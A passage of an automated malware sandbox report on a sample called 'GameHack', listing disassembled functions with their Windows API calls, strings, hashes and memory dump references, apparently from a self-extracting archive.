                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                                      • Instruction ID: 6d920b8bb74e89132e7e8d0ebb90f6566e30ca02882ca554b41aa62955869a75
                                      • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                                      • Instruction Fuzzy Hash: 0FA1577190038E9FEB25CF68C8917BEBBE5EF65314F1451ADE6D5AB382C2388942C750
                                      Function 00EDA2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00ED80B7,?,?,?), ref: 00EDA351
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00ED80B7,?,?), ref: 00EDA395
                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00ED80B7,?,?,?,?,?,?,?,?), ref: 00EDA416
                                      • CloseHandle.KERNEL32(?,?,00000000,?,00ED80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00EDA41D
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: File$Create$CloseHandleTime
                                      • String ID:
                                      • API String ID: 2287278272-0
                                      • Opcode ID: 240ba4401f0ab2789ce52eb2647b12b42294a7f46cc7d72f5f2fc082736b7a97
                                      • Instruction ID: 0429b30067e52cab3d533f6a5e77bd001e36bad43da6efd46e8126ad6881e3ea
                                      • Opcode Fuzzy Hash: 240ba4401f0ab2789ce52eb2647b12b42294a7f46cc7d72f5f2fc082736b7a97
                                      • Instruction Fuzzy Hash: 1441D0312483859AD731DF24DC45BEEBBE9EB81704F08092EB5E0A3291D7A49B49DB53
                                      Function 00EFC099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00EF89AD,?,00000000,?,00000001,?,?,00000001,00EF89AD,?), ref: 00EFC0E6
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EFC16F
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00EF67E2,?), ref: 00EFC181
                                      • __freea.LIBCMT ref: 00EFC18A
                                        • Part of subcall function 00EF8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EFC13D,00000000,?,00EF67E2,?,00000008,?,00EF89AD,?,?,?), ref: 00EF854A
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: 2abcc1213ae75236d162f40ba5a7c0c1d4e67a876e023609820b650964c8ddb2
                                      • Instruction ID: 0ec63818bd6fa139aa17dd491ddd077155cd2649a0b147277fee2d279662ecf1
                                      • Opcode Fuzzy Hash: 2abcc1213ae75236d162f40ba5a7c0c1d4e67a876e023609820b650964c8ddb2
                                      • Instruction Fuzzy Hash: 2531D072A0121EABDB248F65DD41DBE7BB9EB44314F244168FD04E7291EB35CD61CBA0
                                      Function 00EE9DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 00EE9DBE
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EE9DCD
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EE9DDB
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00EE9DE9
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: f134084670ec0f00d930bf388918a91ec9941d7cb8633d4c139a52e751aefd92
                                      • Instruction ID: c3b55e85d4c2c273e1563fa6ab5ebcec69a14c42c40f19a02c3e2ef5a5263e0c
                                      • Opcode Fuzzy Hash: f134084670ec0f00d930bf388918a91ec9941d7cb8633d4c139a52e751aefd92
                                      • Instruction Fuzzy Hash: 46E0C271989729A7D3A41BB0BD0CBCB3F56AB09773F050004F701A61D0DE704409EF90
                                      Function 00EF2016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00EF2016
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00EF201B
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00EF2020
                                        • Part of subcall function 00EF310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00EF311F
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00EF2035
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0
                                      • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                      • Instruction ID: 8d1a1faff69b6c3706851c6f95c5e38c5e9fa195f5392e526b8350884e064c9d
                                      • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                      • Instruction Fuzzy Hash: 94C04C2610764CE41C113AB161031BD07C00C637C8B9270CAEB9037143DF060A0AA037
                                      Function 00EE9F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00EE9DF1: GetDC.USER32(00000000), ref: 00EE9DF5
                                        • Part of subcall function 00EE9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EE9E00
                                        • Part of subcall function 00EE9DF1: ReleaseDC.USER32(00000000,00000000), ref: 00EE9E0B
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00EE9F8D
                                        • Part of subcall function 00EEA1E5: GetDC.USER32(00000000), ref: 00EEA1EE
                                        • Part of subcall function 00EEA1E5: GetObjectW.GDI32(?,00000018,?), ref: 00EEA21D
                                        • Part of subcall function 00EEA1E5: ReleaseDC.USER32(00000000,?), ref: 00EEA2B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ObjectRelease$CapsDevice
                                      • String ID: (
                                      • API String ID: 1061551593-3887548279
                                      • Opcode ID: 1fd0ead85515e3dd5335baea4e5cdae492aab73e251fdad245fa05c53a467c22
                                      • Instruction ID: 1d676c6ef27fea29a17c3e0e1fd9b60192988d65cbe1a4ac92020e77a16c39aa
                                      • Opcode Fuzzy Hash: 1fd0ead85515e3dd5335baea4e5cdae492aab73e251fdad245fa05c53a467c22
                                      • Instruction Fuzzy Hash: 85810371208358AFC714DF69C84492ABBE9FF88714F04492DF98AE7260DB71AD05DB52
                                      Function 00EE0E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _swprintf
                                      • String ID: %ls$%s: %s
                                      • API String ID: 589789837-2259941744
                                      • Opcode ID: c321f4356fd67f76b2ee65de65f613345cdbe42b888a4f515c9609499f4bdae8
                                      • Instruction ID: efe969d6f2d9a5adc7e83c82a23fb7130066d8f83504203d6fc37aaa43afca8a
                                      • Opcode Fuzzy Hash: c321f4356fd67f76b2ee65de65f613345cdbe42b888a4f515c9609499f4bdae8
                                      • Instruction Fuzzy Hash: E751C83124C7CCF9EE211A96CD42FB676A6A704B00F247916F39A744F5C6F154D0B612
                                      Function 00EFA918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00EFAA84
                                        • Part of subcall function 00EF8849: IsProcessorFeaturePresent.KERNEL32(00000017,00EF8838,00000050,00F03958,?,00EDCFE0,00000004,00F10EE8,?,?,00EF8845,00000000,00000000,00000000,00000000,00000000), ref: 00EF884B
                                        • Part of subcall function 00EF8849: GetCurrentProcess.KERNEL32(C0000417,00F03958,00000050,00F10EE8), ref: 00EF886D
                                        • Part of subcall function 00EF8849: TerminateProcess.KERNEL32(00000000), ref: 00EF8874
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: *?$.
                                      • API String ID: 2667617558-3972193922
                                      • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                                      • Instruction ID: 474b0d826a03eb782dac6408717ecd52d193960ef4496a1d9b5743a8e70df31e
                                      • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                                      • Instruction Fuzzy Hash: 4251BFB1E0020EAFDB14DFA8C9419BDB7F5EF88314F299079E658BB300E6719A058B51
                                      Function 00ED772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED7730
                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00ED78CC
                                        • Part of subcall function 00EDA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00EDA27A,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA458
                                        • Part of subcall function 00EDA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00EDA27A,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA489
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: File$Attributes$H_prologTime
                                      • String ID: :
                                      • API String ID: 1861295151-336475711
                                      • Opcode ID: ac9facfb51343708864ec68432ad330c3377c3ac8ab84bc10aefd40f53dcec51
                                      • Instruction ID: 91c95e2d1a36293b314d14c75e2b3944abc22d1500635c26d26f754e2dc175c0
                                      • Opcode Fuzzy Hash: ac9facfb51343708864ec68432ad330c3377c3ac8ab84bc10aefd40f53dcec51
                                      • Instruction Fuzzy Hash: D2419471905268AADB24EB50DD45EEEB3BCEF44300F00509BB649B3292EB745F86DF61
                                      Function 00EDB66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: UNC$\\?\
                                      • API String ID: 0-253988292
                                      • Opcode ID: 0bb37662ed6b0cbe021faca22ed8c556d017f52f142c1ee3cf8ead608e8cb2a6
                                      • Instruction ID: 5e1b76b759454aa1ed945ee956b8a5c5832677c11fd212eaec8598eb5abec2fe
                                      • Opcode Fuzzy Hash: 0bb37662ed6b0cbe021faca22ed8c556d017f52f142c1ee3cf8ead608e8cb2a6
                                      • Instruction Fuzzy Hash: BC418C35800259EBCB20AF21DC41EEF77A9EF84794B126167F815B6352F770DA429A60
                                      Function 00EE8FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Shell.Explorer$about:blank
                                      • API String ID: 0-874089819
                                      • Opcode ID: c4b2e2090c999b84cb801e4a722ebf8c463a81fda7acb6fa151fc4f35e9fd088
                                      • Instruction ID: c8a47fafa66a5597b834a012b1713f1a426f0e844463f4afed97d12c4aa7140d
                                      • Opcode Fuzzy Hash: c4b2e2090c999b84cb801e4a722ebf8c463a81fda7acb6fa151fc4f35e9fd088
                                      • Instruction Fuzzy Hash: 4C2182712043989FCB18DF65C895A6A77E8FF84711B14856DF909AB287DB70EC00DB60
                                      Function 00EDEBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00EDEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00EDEB92
                                        • Part of subcall function 00EDEB73: GetProcAddress.KERNEL32(00F181C0,CryptUnprotectMemory), ref: 00EDEBA2
                                      • GetCurrentProcessId.KERNEL32(?,?,?,00EDEBEC), ref: 00EDEC84
                                      Strings
                                      • CryptUnprotectMemory failed, xrefs: 00EDEC7C
                                      • CryptProtectMemory failed, xrefs: 00EDEC3B
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentProcess
                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                      • API String ID: 2190909847-396321323
                                      • Opcode ID: fa2d0d34adc472c7d219083785ab020782ec61be68d7be0ace84c1dcff28373f
                                      • Instruction ID: 035169c674dea6e0026a7d8775ee7508e7f99666e24149402eedf9f83d908d1f
                                      • Opcode Fuzzy Hash: fa2d0d34adc472c7d219083785ab020782ec61be68d7be0ace84c1dcff28373f
                                      • Instruction Fuzzy Hash: 0F115932A112686BDB157B34DD0AAAE7758EF04764B05901BFC057F381CB75AE43A7D0
                                      Function 00EE0889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00010000,00EE09D0,?,00000000,00000000), ref: 00EE08AD
                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 00EE08F4
                                        • Part of subcall function 00ED6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED6EAF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                      • String ID: CreateThread failed
                                      • API String ID: 2655393344-3849766595
                                      • Opcode ID: d13262bb056249bc1633dfa36fd8a314911d731262db93ed97747825dcdabb88
                                      • Instruction ID: 2f19d1ddef207ce7fa4f926480a52bbe963c65d877120e8a518fc3cd857415f0
                                      • Opcode Fuzzy Hash: d13262bb056249bc1633dfa36fd8a314911d731262db93ed97747825dcdabb88
                                      • Instruction Fuzzy Hash: CF01F9B134430D6FD6246F55EC82FA67398EF84715F10043EFA86B6181CEF1A8C2A664
                                      Function 00ED130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00EDDA98: _swprintf.LIBCMT ref: 00EDDABE
                                        • Part of subcall function 00EDDA98: _strlen.LIBCMT ref: 00EDDADF
                                        • Part of subcall function 00EDDA98: SetDlgItemTextW.USER32(?,00F0E154,?), ref: 00EDDB3F
                                        • Part of subcall function 00EDDA98: GetWindowRect.USER32(?,?), ref: 00EDDB79
                                        • Part of subcall function 00EDDA98: GetClientRect.USER32(?,?), ref: 00EDDB85
                                      • GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                      • SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                      • String ID: 0
                                      • API String ID: 2622349952-4108050209
                                      • Opcode ID: ceaee0fb4772bd926fbfa5626195954ad8483ba0d56b0ce15e4fb4bfece363df
                                      • Instruction ID: f8fc25a3140fafb52da818ea2b5c976e653334ccf999dc0a9e009bcd02b49bb7
                                      • Opcode Fuzzy Hash: ceaee0fb4772bd926fbfa5626195954ad8483ba0d56b0ce15e4fb4bfece363df
                                      • Instruction Fuzzy Hash: ADF0AF3010438CB6DF251F618D09BE93B99FB10359F09A096FD49646A1CBB4C996FB10
                                      Function 00EE084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00EE0A78,?), ref: 00EE0854
                                      • GetLastError.KERNEL32(?), ref: 00EE0860
                                        • Part of subcall function 00ED6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED6EAF
                                      Strings
                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00EE0869
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                      • API String ID: 1091760877-2248577382
                                      • Opcode ID: e016e7b548cbc263591c8f8f4462471ce57affa7ec82735becce4a46d07a040e
